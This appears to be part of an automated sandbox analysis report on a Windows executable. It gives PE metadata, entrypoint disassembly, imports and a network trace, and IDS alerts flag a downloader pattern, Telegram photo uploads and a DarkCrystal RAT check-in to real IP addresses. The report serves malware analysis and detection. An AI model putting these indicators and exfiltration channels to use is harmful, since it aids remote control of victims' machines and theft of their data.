                                                                                                                  Digitally signed:false
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:5
                                                                                                                  OS Version Minor:1
                                                                                                                  File Version Major:5
                                                                                                                  File Version Minor:1
                                                                                                                  Subsystem Version Major:5
                                                                                                                  Subsystem Version Minor:1
                                                                                                                  Import Hash:12e12319f1029ec4f8fcbed7e82df162

                                                                                                                  Entrypoint Preview

                                                                                                                  Instruction
                                                                                                                  call 00007FA5F4B33CFBh
                                                                                                                  jmp 00007FA5F4B3360Dh
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  push esi
                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                  mov esi, ecx
                                                                                                                  call 00007FA5F4B26457h
                                                                                                                  mov dword ptr [esi], 004356D0h
                                                                                                                  mov eax, esi
                                                                                                                  pop esi
                                                                                                                  pop ebp
                                                                                                                  retn 0004h
                                                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                                                  mov eax, ecx
                                                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                                                  mov dword ptr [ecx+04h], 004356D8h
                                                                                                                  mov dword ptr [ecx], 004356D0h
                                                                                                                  ret
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  push esi
                                                                                                                  mov esi, ecx
                                                                                                                  lea eax, dword ptr [esi+04h]
                                                                                                                  mov dword ptr [esi], 004356B8h
                                                                                                                  push eax
                                                                                                                  call 00007FA5F4B36A9Fh
                                                                                                                  test byte ptr [ebp+08h], 00000001h
                                                                                                                  pop ecx
                                                                                                                  je 00007FA5F4B3379Ch
                                                                                                                  push 0000000Ch
                                                                                                                  push esi
                                                                                                                  call 00007FA5F4B32D59h
                                                                                                                  pop ecx
                                                                                                                  pop ecx
                                                                                                                  mov eax, esi
                                                                                                                  pop esi
                                                                                                                  pop ebp
                                                                                                                  retn 0004h
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  sub esp, 0Ch
                                                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                                                  call 00007FA5F4B263D2h
                                                                                                                  push 0043BEF0h
                                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                                  push eax
                                                                                                                  call 00007FA5F4B36559h
                                                                                                                  int3
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  sub esp, 0Ch
                                                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                                                  call 00007FA5F4B33718h
                                                                                                                  push 0043C0F4h
                                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                                  push eax
                                                                                                                  call 00007FA5F4B3653Ch
                                                                                                                  int3
                                                                                                                  jmp 00007FA5F4B37FD7h
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  push 00422900h
                                                                                                                  push dword ptr fs:[00000000h]

                                                                                                                  Rich Headers

                                                                                                                  Programming Language:
                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                  • [IMP] VS2008 SP1 build 30729

                                                                                                                  Data Directories

                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000xdff8.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000x233c.reloc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                  Sections

                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                  .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .rsrc0x640000xdff80xe000ba08fbcd0ed7d9e6a268d75148d9914bFalse0.6373639787946429data6.638661032196024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .reloc0x720000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                  Resources

                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                  PNG0x646500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                                                                  PNG0x651980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                                                                  RT_ICON0x667480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                                                                                                  RT_ICON0x66cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                                                                                                  RT_ICON0x675580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                                                                                                  RT_ICON0x684000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                                                                                                  RT_ICON0x688680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                                                                                                  RT_ICON0x699100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                                                                                                  RT_ICON0x6beb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                                                                                                  RT_DIALOG0x705880x286dataEnglishUnited States0.5092879256965944
                                                                                                                  RT_DIALOG0x703580x13adataEnglishUnited States0.60828025477707
                                                                                                                  RT_DIALOG0x704980xecdataEnglishUnited States0.6991525423728814
                                                                                                                  RT_DIALOG0x702280x12edataEnglishUnited States0.5927152317880795
                                                                                                                  RT_DIALOG0x6fef00x338dataEnglishUnited States0.45145631067961167
                                                                                                                  RT_DIALOG0x6fc980x252dataEnglishUnited States0.5757575757575758
                                                                                                                  RT_STRING0x70f680x1e2dataEnglishUnited States0.3900414937759336
                                                                                                                  RT_STRING0x711500x1ccdataEnglishUnited States0.4282608695652174
                                                                                                                  RT_STRING0x713200x1b8dataEnglishUnited States0.45681818181818185
                                                                                                                  RT_STRING0x714d80x146dataEnglishUnited States0.5153374233128835
                                                                                                                  RT_STRING0x716200x46cdataEnglishUnited States0.3454063604240283
                                                                                                                  RT_STRING0x71a900x166dataEnglishUnited States0.49162011173184356
                                                                                                                  RT_STRING0x71bf80x152dataEnglishUnited States0.5059171597633136
                                                                                                                  RT_STRING0x71d500x10adataEnglishUnited States0.49624060150375937
                                                                                                                  RT_STRING0x71e600xbcdataEnglishUnited States0.6329787234042553
                                                                                                                  RT_STRING0x71f200xd6dataEnglishUnited States0.5747663551401869
                                                                                                                  RT_GROUP_ICON0x6fc300x68dataEnglishUnited States0.7019230769230769
                                                                                                                  RT_MANIFEST0x708100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                                                                                  Imports

                                                                                                                  DLLImport
                                                                                                                  KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                                                                                  OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                                                                  gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                                                                                  Possible Origin

                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                  EnglishUnited States

                                                                                                                  Network Behavior

                                                                                                                  Suricata IDS Alerts

                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                  2025-01-01T16:02:09.731720+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.64971134.117.59.81443TCP
                                                                                                                  2025-01-01T16:02:10.878208+01001810009Joe Security ANOMALY Telegram Send Photo1192.168.2.649712149.154.167.220443TCP
                                                                                                                  2025-01-01T16:02:15.989325+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.649735104.21.38.8480TCP

                                                                                                                  Network Port Distribution

                                                                                                                  TCP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Jan 1, 2025 16:02:08.436549902 CET49710443192.168.2.634.117.59.81
                                                                                                                  Jan 1, 2025 16:02:08.436628103 CET4434971034.117.59.81192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:08.436781883 CET49710443192.168.2.634.117.59.81
                                                                                                                  Jan 1, 2025 16:02:08.451524019 CET49710443192.168.2.634.117.59.81
                                                                                                                  Jan 1, 2025 16:02:08.451539993 CET4434971034.117.59.81192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:08.927926064 CET4434971034.117.59.81192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:08.928000927 CET49710443192.168.2.634.117.59.81
                                                                                                                  Jan 1, 2025 16:02:08.931128025 CET49710443192.168.2.634.117.59.81
                                                                                                                  Jan 1, 2025 16:02:08.931133032 CET4434971034.117.59.81192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:08.931457043 CET4434971034.117.59.81192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:08.984961987 CET49710443192.168.2.634.117.59.81
                                                                                                                  Jan 1, 2025 16:02:08.987788916 CET49710443192.168.2.634.117.59.81
                                                                                                                  Jan 1, 2025 16:02:09.035329103 CET4434971034.117.59.81192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:09.113797903 CET4434971034.117.59.81192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:09.114126921 CET4434971034.117.59.81192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:09.114212990 CET49710443192.168.2.634.117.59.81
                                                                                                                  Jan 1, 2025 16:02:09.119798899 CET49710443192.168.2.634.117.59.81
                                                                                                                  Jan 1, 2025 16:02:09.124877930 CET49711443192.168.2.634.117.59.81
                                                                                                                  Jan 1, 2025 16:02:09.124908924 CET4434971134.117.59.81192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:09.125067949 CET49711443192.168.2.634.117.59.81
                                                                                                                  Jan 1, 2025 16:02:09.125320911 CET49711443192.168.2.634.117.59.81
                                                                                                                  Jan 1, 2025 16:02:09.125335932 CET4434971134.117.59.81192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:09.594623089 CET4434971134.117.59.81192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:09.597037077 CET49711443192.168.2.634.117.59.81
                                                                                                                  Jan 1, 2025 16:02:09.597069979 CET4434971134.117.59.81192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:09.731873035 CET4434971134.117.59.81192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:09.732403040 CET4434971134.117.59.81192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:09.732656956 CET49711443192.168.2.634.117.59.81
                                                                                                                  Jan 1, 2025 16:02:09.732960939 CET49711443192.168.2.634.117.59.81
                                                                                                                  Jan 1, 2025 16:02:09.946480989 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:09.946540117 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:09.946739912 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:09.947906971 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:09.947922945 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:10.587555885 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:10.587640047 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:10.591047049 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:10.591061115 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:10.591361046 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:10.592694044 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:10.639349937 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:10.878307104 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:10.905874014 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:10.905901909 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:10.907681942 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:10.907689095 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:10.907843113 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:10.907846928 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:10.907902956 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:10.907907009 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:10.907990932 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:10.907996893 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:10.908035040 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:10.908037901 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:10.908143997 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:10.908150911 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:10.908235073 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:10.908245087 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:10.908514977 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:10.908519030 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:10.908575058 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:10.908581018 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:10.908622980 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:10.908631086 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:10.908651114 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:10.908657074 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:10.908698082 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:10.908704042 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:10.908731937 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:10.908737898 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:10.908782005 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:10.908787966 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:10.908931971 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:10.908941031 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:10.909029007 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:10.909055948 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:10.909104109 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:10.909137964 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:10.909213066 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:10.909225941 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:10.909328938 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:10.909360886 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:10.909400940 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:10.909409046 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:10.909441948 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:10.909480095 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:10.909487963 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:10.909502983 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:10.909717083 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:10.909723997 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:10.909773111 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:10.909778118 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:10.909811974 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:10.909818888 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:10.909991026 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:10.909996033 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:11.993753910 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:11.993932009 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:11.993946075 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:11.994045019 CET44349712149.154.167.220192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:11.994096994 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:12.015810966 CET49712443192.168.2.6149.154.167.220
                                                                                                                  Jan 1, 2025 16:02:15.388952017 CET4973580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:15.393757105 CET8049735104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:15.393835068 CET4973580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:15.394190073 CET4973580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:15.398979902 CET8049735104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:15.751516104 CET4973580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:15.756383896 CET8049735104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:15.855865002 CET8049735104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:15.989325047 CET4973580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:16.139549017 CET8049735104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:16.139569044 CET8049735104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:16.139987946 CET4973580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:16.171900988 CET4973580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:16.176734924 CET8049735104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:16.269342899 CET8049735104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:16.269892931 CET4973580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:16.274761915 CET8049735104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:16.421159029 CET4974180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:16.425975084 CET8049741104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:16.426311016 CET4974180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:16.426666021 CET4974180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:16.431425095 CET8049741104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:16.533253908 CET8049735104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:16.578543901 CET4973580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:16.584022999 CET4973580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:16.584743977 CET4974580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:16.589344978 CET8049735104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:16.589431047 CET4973580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:16.589530945 CET8049745104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:16.589689970 CET4974580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:16.589689970 CET4974580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:16.594532967 CET8049745104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:16.783961058 CET4974180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:16.788815022 CET8049741104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:16.872229099 CET8049741104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:16.938364029 CET4974580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:16.943206072 CET8049745104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:16.943295956 CET8049745104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:16.969398022 CET4974180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:17.054145098 CET8049745104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:17.095577002 CET4974580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:17.139561892 CET8049741104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:17.266274929 CET4974180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:17.276230097 CET4974180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:17.277451038 CET4975180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:17.281208038 CET8049741104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:17.281265020 CET4974180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:17.282334089 CET8049751104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:17.282391071 CET4975180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:17.282624960 CET4975180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:17.287374020 CET8049751104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:17.313070059 CET8049745104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:17.360007048 CET4974580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:17.641423941 CET4975180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:17.646289110 CET8049751104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:17.726901054 CET8049751104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:17.860039949 CET4975180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:18.011533022 CET8049751104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:18.156908989 CET4975180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:18.177797079 CET4974580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:18.177938938 CET4975180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:18.181885958 CET4976180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:18.182733059 CET8049745104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:18.182945967 CET4974580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:18.183103085 CET8049751104.21.38.84192.168.2.6
